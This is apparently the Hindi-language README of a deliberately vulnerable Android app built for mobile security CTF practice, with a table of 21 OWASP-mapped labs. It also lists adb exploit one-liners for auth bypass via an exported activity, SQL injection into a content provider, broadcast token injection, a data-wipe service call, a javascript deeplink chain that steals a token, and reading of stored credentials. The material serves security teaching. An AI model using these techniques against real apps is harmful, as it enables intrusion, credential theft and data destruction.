
मोबाइल सुरक्षा अनुसंधान और बग बाउंटी अभ्यास के लिए जानबूझकर कमजोर Android ऐप - OWASP Mobile Top 10
मोबाइल सुरक्षा अनुसंधान, बग बाउंटी अभ्यास, और CTF-शैली सीखने के लिए एक जानबूझकर कमजोर Android एप्लिकेशन। इसमें OWASP Mobile Top 10 पर मैप की गई 21 प्रलेखित कमजोरियाँ शामिल हैं।
git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk
ऐप लॉन्च करें, प्रत्येक लैब पर काम करें, फ्लैग कैप्चर करें, और उन्हें इन-ऐप CTF स्कोरबोर्ड पर सबमिट करें।
| श्रेणी | कमजोरियाँ | फ्लैग |
|---|---|---|
| WebView | WV-01 से WV-05 | 5 |
| Deeplink | DL-01 से DL-04, DL-CHAIN | 5 |
| Auth / SQL Injection | SQL-01 | 1 |
| Admin Panel | AP-01 से AP-04 | 2 |
| ContentProvider | CP-01 | 1 |
| Broadcast Receiver | BR-01 से BR-03 | 2 |
| Service | SV-01, SV-02a, SV-02b | 2 |
| Network Interception | NET-01 | 1 |
| Banking / OTP | OTP-01 | 1 |
| LFI | LFI-01 | 1 |
| Storage | STORE-01 | 1 |
| XSS | XSS-01, XSS-02 | 2 |
कुल 20 फ्लैग, साथ ही सभी को कैप्चर करने पर एक मास्टर फ्लैग प्रदान किया जाता है।
| लैब सूची | CTF स्कोरबोर्ड |
|---|---|
| lab |
# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true
adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""
# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker
# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data
# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"
# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml
# Watch for logged secrets
adb logcat | grep Gu3ssWeak
यह परियोजना विशुद्ध रूप से शैक्षिक है। सभी कमजोरियाँ जानबूझकर हैं और प्रलेखित हैं। यहाँ दिखाई गई तकनीकें वास्तविक ऐप्स पर लागू होती हैं, लेकिन केवल उन सिस्टमों का परीक्षण करें जिनके आप मालिक हैं या जिनका परीक्षण करने के लिए आप अधिकृत हैं। पूर्ण अस्वीकरण और जिम्मेदार प्रकटीकरण मार्गदर्शन के लिए SECURITY.md देखें।
MIT - देखें LICENSE।